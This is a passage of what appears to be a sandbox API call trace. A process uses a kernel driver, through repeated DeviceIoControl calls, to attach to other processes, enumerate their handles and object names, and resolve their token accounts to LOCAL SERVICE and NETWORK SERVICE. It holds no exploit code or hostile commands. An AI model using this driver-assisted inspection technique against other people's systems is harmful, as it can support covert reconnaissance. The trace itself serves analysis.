Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0224.058] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xcf [0224.058] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8002199b00 | out: TokenHandle=0xfffffa8002199b00*=0xc4) returned 0x0 [0224.058] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0224.059] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.059] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0224.059] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x13), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="LOCAL SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0224.060] CloseHandle (hObject=0xc4) returned 1 [0224.060] CloseHandle (hObject=0xc8) returned 1 [0224.060] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.060] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0224.060] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.060] PsAcquireProcessExitSynchronization () returned 0x0 [0224.060] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0) [0224.060] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003664470, HandleInformation=0x0) returned 0x0 [0224.061] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.061] PsReleaseProcessExitSynchronization () returned 0x2 [0224.061] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xcd [0224.061] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa800307f044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa800307f044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.061] ObfDereferenceObject (Object=0xfffffa8003664470) returned 0x1 [0224.061] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.061] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.061] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.061] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0224.061] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.061] PsAcquireProcessExitSynchronization () returned 0x0 [0224.061] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0) [0224.061] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8009e52310, HandleInformation=0x0) returned 0x0 [0224.061] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.061] PsReleaseProcessExitSynchronization () returned 0x2 [0224.061] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xcd [0224.061] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa80019dd044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80019dd044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.061] ObfDereferenceObject (Object=0xfffffa8009e52310) returned 0x1 [0224.061] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.061] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.061] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.061] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0224.061] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.061] PsAcquireProcessExitSynchronization () returned 0x0 [0224.061] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0) [0224.061] ObReferenceObjectByHandle (in: Handle=0xd4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038e3da0, HandleInformation=0x0) returned 0x0 [0224.062] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.062] PsReleaseProcessExitSynchronization () returned 0x2 [0224.062] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xcd [0224.062] ObQueryNameString (in: Object=0xfffffa80038e3da0, ObjectNameInfo=0xfffffa800306d044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306d044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.062] ObfDereferenceObject (Object=0xfffffa80038e3da0) returned 0x1 [0224.062] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.062] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.062] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.062] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x54, lpOverlapped=0x0) returned 1 [0224.062] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.062] PsAcquireProcessExitSynchronization () returned 0x0 [0224.062] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0) [0224.062] ObReferenceObjectByHandle (in: Handle=0x104, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a000b13910, HandleInformation=0x0) returned 0x0 [0224.062] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.062] PsReleaseProcessExitSynchronization () returned 0x2 [0224.062] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xcd [0224.062] ObQueryNameString (in: Object=0xfffff8a000b13910, ObjectNameInfo=0xfffffa800306e044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306e044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.062] ObfDereferenceObject (Object=0xfffff8a000b13910) returned 0x24 [0224.062] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.062] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.062] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.062] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x3a, lpOverlapped=0x0) returned 1 [0224.062] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.062] PsAcquireProcessExitSynchronization () returned 0x0 [0224.062] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0) [0224.062] ObReferenceObjectByHandle (in: Handle=0x394, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffff8a001170d80, HandleInformation=0x0) returned 0x0 [0224.062] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.062] PsReleaseProcessExitSynchronization () returned 0x2 [0224.063] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xcd [0224.063] ObQueryNameString (in: Object=0xfffff8a001170d80, ObjectNameInfo=0xfffffa8003070044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003070044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.063] ObfDereferenceObject (Object=0xfffff8a001170d80) returned 0x8 [0224.063] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.063] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.063] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.063] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x8c, lpOverlapped=0x0) returned 1 [0224.063] PsLookupProcessByProcessId (in: ProcessId=0xc8, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.063] PsAcquireProcessExitSynchronization () returned 0x0 [0224.063] KeStackAttachProcess (in: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038b5b30, ApcState=0xfffff880052b35d0) [0224.063] ObReferenceObjectByHandle (in: Handle=0x3c0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80039cf710, HandleInformation=0x0) returned 0x0 [0224.063] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.063] PsReleaseProcessExitSynchronization () returned 0x2 [0224.063] ObfDereferenceObject (Object=0xfffffa80038b5b30) returned 0xcd [0224.063] ObQueryNameString (in: Object=0xfffffa80039cf710, ObjectNameInfo=0xfffffa80033fa344, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa80033fa344, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.063] ObfDereferenceObject (Object=0xfffffa80039cf710) returned 0x1 [0224.063] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.063] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.063] OpenProcess (dwDesiredAccess=0x400, bInheritHandle=0, dwProcessId=0x11c) returned 0xc8 [0224.063] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x8335000c, lpInBuffer=0x12d3d0*, nInBufferSize=0x8, lpOutBuffer=0x12d3d8, nOutBufferSize=0x8, lpBytesReturned=0x12d360, lpOverlapped=0x0 | out: lpInBuffer=0x12d3d0*, lpOutBuffer=0x12d3d8*, lpBytesReturned=0x12d360*=0x8, lpOverlapped=0x0) returned 1 [0224.063] ObReferenceObjectByHandle (in: Handle=0xc8, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0x1, Object=0xfffff880052b3668, HandleInformation=0x0 | out: Object=0xfffff880052b3668*=0xfffffa80038c8b30, HandleInformation=0x0) returned 0x0 [0224.063] ObOpenObjectByPointer (in: Object=0xfffffa80038c8b30, HandleAttributes=0x200, PassedAccessState=0x0, DesiredAccess=0x10000000, ObjectType=0x0, AccessMode=0x0, Handle=0xfffff880052b3670 | out: Handle=0xfffff880052b3670*=0xffffffff800005bc) returned 0x0 [0224.063] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb3 [0224.063] ZwOpenProcessToken (in: ProcessHandle=0xffffffff800005bc, DesiredAccess=0x8, TokenHandle=0xfffffa8002199b00 | out: TokenHandle=0xfffffa8002199b00*=0xc4) returned 0x0 [0224.063] ZwClose (Handle=0xffffffff800005bc) returned 0x0 [0224.064] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.064] GetTokenInformation (in: TokenHandle=0xc4, TokenInformationClass=0x1, TokenInformation=0x12d3f0, TokenInformationLength=0x800, ReturnLength=0x12d3c8 | out: TokenInformation=0x12d3f0, ReturnLength=0x12d3c8) returned 1 [0224.064] LookupAccountSidW (in: lpSystemName="", Sid=0x12d400*(Revision=0x1, SubAuthorityCount=0x1, IdentifierAuthority.Value=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x5), SubAuthority=0x14), Name=0x12ecb0, cchName=0x12d3c0, ReferencedDomainName=0x12e690, cchReferencedDomainName=0x12e440, peUse=0x12d3e0 | out: Name="NETWORK SERVICE", cchName=0x12d3c0, ReferencedDomainName="NT AUTHORITY", cchReferencedDomainName=0x12e440, peUse=0x12d3e0) returned 1 [0224.065] CloseHandle (hObject=0xc4) returned 1 [0224.065] CloseHandle (hObject=0xc8) returned 1 [0224.065] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.065] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x5a, lpOverlapped=0x0) returned 1 [0224.065] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.065] PsAcquireProcessExitSynchronization () returned 0x0 [0224.065] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.065] ObReferenceObjectByHandle (in: Handle=0xc, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8003429af0, HandleInformation=0x0) returned 0x0 [0224.065] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.066] PsReleaseProcessExitSynchronization () returned 0x2 [0224.066] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.066] ObQueryNameString (in: Object=0xfffffa8002828cd0, ObjectNameInfo=0xfffffa80031447c4, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa80031447c4, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.066] ObfDereferenceObject (Object=0xfffffa8003429af0) returned 0x1 [0224.066] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.066] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.066] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.066] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x26, lpOverlapped=0x0) returned 1 [0224.066] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.066] PsAcquireProcessExitSynchronization () returned 0x0 [0224.066] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.066] ObReferenceObjectByHandle (in: Handle=0x5c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038df930, HandleInformation=0x0) returned 0x0 [0224.066] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.066] PsReleaseProcessExitSynchronization () returned 0x2 [0224.066] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.066] ObQueryNameString (in: Object=0xfffffa80026efe40, ObjectNameInfo=0xfffffa8003138044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003138044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.066] ObfDereferenceObject (Object=0xfffffa80038df930) returned 0x1 [0224.066] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.066] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.066] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.066] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0224.066] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.066] PsAcquireProcessExitSynchronization () returned 0x0 [0224.066] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.067] ObReferenceObjectByHandle (in: Handle=0x11c, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80038e5d40, HandleInformation=0x0) returned 0x0 [0224.067] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.067] PsReleaseProcessExitSynchronization () returned 0x2 [0224.067] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.067] ObQueryNameString (in: Object=0xfffffa80038e5d40, ObjectNameInfo=0xfffffa8003081044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003081044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.067] ObfDereferenceObject (Object=0xfffffa80038e5d40) returned 0x3 [0224.067] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.067] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.067] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.067] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x72, lpOverlapped=0x0) returned 1 [0224.067] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.067] PsAcquireProcessExitSynchronization () returned 0x0 [0224.067] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.067] ObReferenceObjectByHandle (in: Handle=0x124, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80037dbf20, HandleInformation=0x0) returned 0x0 [0224.067] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.067] PsReleaseProcessExitSynchronization () returned 0x2 [0224.067] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.067] ObQueryNameString (in: Object=0xfffffa80037dbf20, ObjectNameInfo=0xfffffa8003075044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa8003075044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.067] ObfDereferenceObject (Object=0xfffffa80037dbf20) returned 0x3 [0224.067] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.067] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.067] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.067] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0224.067] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.067] PsAcquireProcessExitSynchronization () returned 0x0 [0224.067] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.067] ObReferenceObjectByHandle (in: Handle=0x1ac, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8001ed7f20, HandleInformation=0x0) returned 0x0 [0224.067] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.068] PsReleaseProcessExitSynchronization () returned 0x2 [0224.068] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.068] ObQueryNameString (in: Object=0xfffffa8001ed7f20, ObjectNameInfo=0xfffffa800306a044, Length=0x800, ReturnLength=0xfffff880052b3550 | out: ObjectNameInfo=0xfffffa800306a044, ReturnLength=0xfffff880052b3550) returned 0x0 [0224.068] ObfDereferenceObject (Object=0xfffffa8001ed7f20) returned 0x2 [0224.068] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.068] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.068] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.068] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0224.068] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.068] PsAcquireProcessExitSynchronization () returned 0x0 [0224.068] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.068] ObReferenceObjectByHandle (in: Handle=0x1d4, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa8002ee2160, HandleInformation=0x0) returned 0x0 [0224.068] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.068] PsReleaseProcessExitSynchronization () returned 0x2 [0224.068] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.068] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8003067044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003067044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.068] ObfDereferenceObject (Object=0xfffffa8002ee2160) returned 0x1 [0224.068] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.068] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.068] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.068] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x32, lpOverlapped=0x0) returned 1 [0224.068] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.068] PsAcquireProcessExitSynchronization () returned 0x0 [0224.068] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | out: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0) [0224.068] ObReferenceObjectByHandle (in: Handle=0x1e0, DesiredAccess=0x0, ObjectType=0x0, AccessMode=0xfffffa80028f3001, Object=0xfffff880052b3548, HandleInformation=0x0 | out: Object=0xfffff880052b3548*=0xfffffa80027dfe80, HandleInformation=0x0) returned 0x0 [0224.068] KeUnstackDetachProcess (ApcState=0xfffff880052b35d0) [0224.068] PsReleaseProcessExitSynchronization () returned 0x2 [0224.068] ObfDereferenceObject (Object=0xfffffa80038c8b30) returned 0xb1 [0224.069] ObQueryNameString (in: Object=0xfffffa80055f8e40, ObjectNameInfo=0xfffffa8003068044, Length=0x800, ReturnLength=0xfffff880052b3508 | out: ObjectNameInfo=0xfffffa8003068044, ReturnLength=0xfffff880052b3508) returned 0x0 [0224.069] ObfDereferenceObject (Object=0xfffffa80027dfe80) returned 0x1 [0224.069] IofCompleteRequest (Irp=0xfffffa80018d8ee0, PriorityBoost=0) [0224.069] HeapFree (in: hHeap=0x320000, dwFlags=0x0, lpMem=0x364b20 | out: hHeap=0x320000) returned 1 [0224.069] RtlAllocateHeap (HeapHandle=0x320000, Flags=0x0, Size=0x808) returned 0x364b20 [0224.069] DeviceIoControl (in: hDevice=0x7c, dwIoControlCode=0x83350048, lpInBuffer=0x12d4c8*, nInBufferSize=0x20, lpOutBuffer=0x364b20, nOutBufferSize=0x808, lpBytesReturned=0x12d450, lpOverlapped=0x0 | out: lpInBuffer=0x12d4c8*, lpOutBuffer=0x364b20*, lpBytesReturned=0x12d450*=0x20, lpOverlapped=0x0) returned 1 [0224.069] PsLookupProcessByProcessId (in: ProcessId=0x11c, Process=0xfffff880052b3558 | out: Process=0xfffff880052b3558) returned 0x0 [0224.069] PsAcquireProcessExitSynchronization () returned 0x0 [0224.069] KeStackAttachProcess (in: PROCESS=0xfffffa80038c8b30, ApcState=0xfffff880052b35d0 | 